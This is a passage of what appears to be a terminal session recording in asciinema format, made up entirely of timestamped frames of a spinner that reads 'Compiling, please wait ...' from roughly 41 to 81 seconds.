[40.907774, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[41.008168, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[41.108478, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[41.208875, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[41.309258, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[41.409677, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[41.510096, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[41.610489, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[41.710888, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[41.811325, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[41.911726, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[42.012131, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[42.112481, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[42.212875, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[42.313276, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[42.413665, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[42.514066, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[42.614391, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[42.714777, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[42.815228, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[42.915651, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[43.016032, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[43.116466, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[43.216878, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[43.317272, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[43.417667, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[43.518058, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[43.618461, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[43.71884, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[43.819261, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[43.919661, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[44.020085, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[44.120484, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[44.220902, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[44.3213, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[44.421728, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[44.522145, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[44.622526, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[44.722857, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[44.823297, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[44.923689, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[45.024077, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[45.124487, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[45.224936, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[45.32532, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[45.425692, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[45.5261, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[45.626498, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[45.726911, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[45.827391, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[45.927805, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[46.028214, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[46.128635, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[46.229046, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[46.329463, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[46.429858, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[46.53027, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[46.630681, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[46.731092, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[46.831522, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[46.931935, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[47.032295, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[47.132703, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[47.233096, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[47.333478, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[47.433872, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[47.534277, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[47.634696, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[47.734976, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[47.83539, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[47.935789, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[48.036167, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[48.136501, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[48.236881, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[48.338159, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[48.43858, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[48.538986, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[48.639381, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[48.739785, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[48.840201, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[48.940598, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[49.040979, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[49.141383, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[49.241756, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[49.342167, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[49.44255, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[49.542965, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[49.643411, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[49.743796, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[49.84423, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[49.944591, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[50.045011, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[50.145406, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[50.245799, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[50.346164, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[50.446573, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[50.546962, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[50.647393, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[50.747797, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[50.848123, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[50.948495, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[51.048896, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[51.149297, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[51.249661, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[51.350084, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[51.450496, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[51.550876, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[51.651312, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[51.751699, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[51.852032, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[51.952418, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[52.052739, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[52.153126, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[52.253524, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[52.353929, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[52.454359, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[52.554761, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[52.655262, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[52.755573, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[52.855979, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[52.956372, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[53.05678, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[53.157173, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[53.257583, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[53.357968, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[53.458361, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[53.558745, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[53.659191, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[53.75952, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[53.859914, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[53.960403, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[54.060775, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[54.161121, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[54.261532, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[54.361897, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[54.462303, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[54.562716, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[54.663139, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[54.763504, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[54.863896, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[54.964285, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[55.064681, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[55.165089, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[55.265494, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[55.365925, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[55.466331, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[55.566731, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[55.667182, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[55.767537, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[55.867885, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[55.968287, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[56.068673, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[56.169075, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[56.269472, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[56.369857, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[56.470284, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[56.570677, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[56.671106, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[56.771496, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[56.871914, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[56.972284, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[57.072686, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[57.173101, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[57.273483, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[57.373895, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[57.474262, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[57.574665, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[57.675196, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[57.775552, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[57.875955, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[57.976382, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[58.076781, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[58.177187, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[58.277562, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[58.377958, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[58.478346, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[58.578729, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[58.679195, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[58.779703, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[58.880107, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[58.980492, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[59.08091, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[59.181308, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[59.281725, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[59.382131, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[59.482534, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[59.582941, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[59.683363, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[59.783768, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[59.884168, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[59.984492, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[60.084869, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[60.185265, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[60.285676, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[60.386062, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[60.486465, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[60.586878, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[60.687248, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[60.787638, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[60.888062, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[60.988848, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[61.089144, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[61.189563, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[61.289966, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[61.390352, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[61.490762, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[61.591224, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[61.691578, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[61.79198, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[61.892385, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[61.992773, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[62.093182, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[62.193771, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[62.294179, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[62.394567, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[62.495003, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[62.595489, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[62.695865, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[62.796274, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[62.896676, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[62.996946, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[63.097368, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[63.197753, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[63.298171, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[63.398576, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[63.498954, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[63.599398, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[63.699798, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[63.800104, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[63.900722, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[64.001097, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[64.101507, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[64.201892, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[64.30221, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[64.402601, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[64.50301, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[64.603386, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[64.70372, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[64.804132, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[64.904475, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[65.004787, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[65.105189, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[65.205872, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[65.306125, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[65.406523, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[65.50694, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[65.60738, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[65.707757, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[65.808174, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[65.908508, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[66.008893, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[66.109256, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[66.209656, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[66.310041, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[66.410445, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[66.510851, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[66.611254, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[66.711671, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[66.812075, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[66.912456, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[67.012852, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[67.113259, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[67.213677, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[67.314064, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[67.414464, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[67.514877, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[67.615287, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[67.7156, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[67.816035, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[67.916479, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[68.016867, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[68.117256, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[68.217673, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[68.318074, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[68.418458, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[68.518881, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[68.619309, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[68.719694, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[68.820101, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[68.920492, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[69.021909, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[69.122323, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[69.22276, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[69.323164, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[69.423547, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[69.523865, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[69.624295, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[69.724699, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[69.825103, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[69.925515, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[70.025957, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[70.126349, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[70.226959, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[70.327365, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[70.427754, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[70.528121, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[70.628494, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[70.728901, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[70.829304, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[70.929709, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[71.030115, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[71.13052, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[71.230937, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[71.331377, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[71.431787, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[71.532172, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[71.632484, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[71.732865, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[71.833282, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[71.933713, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[72.034101, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[72.134481, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[72.234968, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[72.335385, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[72.435802, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[72.536205, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[72.636621, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[72.737031, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[72.837414, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[72.937811, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[73.038208, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[73.138645, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[73.239036, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[73.339413, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[73.439815, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[73.540193, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[73.640579, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[73.740986, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[73.841425, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[73.941805, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[74.042193, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[74.14405, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[74.244436, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[74.344812, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[74.445225, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[74.545622, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[74.646031, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[74.74642, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[74.846823, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[74.947239, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[75.047631, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[75.148039, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[75.248461, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[75.348851, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[75.44925, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[75.549652, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[75.650025, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[75.750385, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[75.850777, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[75.951215, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[76.051576, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[76.151976, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[76.252363, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[76.352775, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[76.453189, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[76.553558, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[76.653938, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[76.754343, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[76.854749, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[76.95517, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[77.055531, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[77.155937, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[77.256294, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[77.35668, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[77.45706, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[77.557462, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[77.65787, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[77.75826, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[77.858666, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[77.959055, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[78.059452, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[78.159833, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[78.260263, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[78.360644, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[78.461032, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[78.561441, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[78.661823, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[78.762231, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[78.862655, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[78.963027, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[79.063401, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[79.163835, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[79.265475, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[79.365878, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[79.466288, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[79.566721, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[79.66709, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[79.767478, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[79.867894, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[79.968304, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[80.068694, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[80.169087, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[80.269465, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[80.369838, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[80.470219, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[80.570601, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[80.671007, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[80.771398, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[80.8718, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[80.972194, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[81.072498, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[81.172906, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[81.273319, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[81.373766, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[81.47417, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
